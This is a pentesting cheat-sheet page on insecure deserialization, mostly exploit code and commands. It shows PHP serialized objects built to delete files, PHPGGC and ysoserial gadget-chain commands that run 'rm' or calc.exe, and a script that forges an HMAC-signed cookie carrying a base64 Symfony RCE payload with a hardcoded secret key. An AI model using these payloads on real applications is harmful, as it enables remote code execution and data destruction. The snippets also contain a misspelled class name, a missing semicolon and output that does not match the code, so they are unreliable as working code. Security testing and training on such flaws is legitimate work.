Insecure Deserialization

Manual and gadget chain manipulation

PHP

Manual serialization

Manual serialization with class internal members override (access to an app source code) in order to achieve specific functionality.

<?php
// app class definition deletes a template file in the class destructor()
// initiate the object through cookie "session" 

class CustomTemplate {
    // make sure the access attribute is "public"
    public $template_file_path;
}    

$c = new CustomTeplate();
$c->template_file_path="/path/file-to-delete.txt"

// final serialized PHP object
echo serialize($c);

/* output
O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:24:"/path/file-to-delete.txt";}
*/
?>

PHPGCC

automatic gadget chain when no source code review is possible

git clone https://github.com/ambionics/phpggc.git

phpggc symfony/rce4 exec 'rm /path/file-to-delete.txt' | base64 -w 0

SHA1-HMAC - PHP signed gadget chain

<?php

$phpgcc_object = "Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319Cg==";
$secretKey = "mx557o5crourg7j9hrmve29bdb60dfsn";

$cookie = urlencode('{"token":"' . $phpgcc_object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $phpgcc_object, $secretKey) . '"}');
echo $cookie;
?>

GitHub - ambionics/phpggc: PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.GitHub

Java

// there is no jar!
git clone https://github.com/frohoff/ysoserial.git

// jar download
wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

java -jar ysoserial.jar CommonsCollections4 calc.exe

java -jar ./ysoserial-master-SNAPSHOT.jar CommonsCollections4 'rm /path/file-to-delete.txt\'|base64 -w0

GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.GitHub

.NET

git clone https://github.com/pwntester/ysoserial.net.git

GitHub - pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formattersGitHub

PreviousServer Side Template Injection (SSTI)NextBrute force

Last updated 1 year ago

Was this helpful?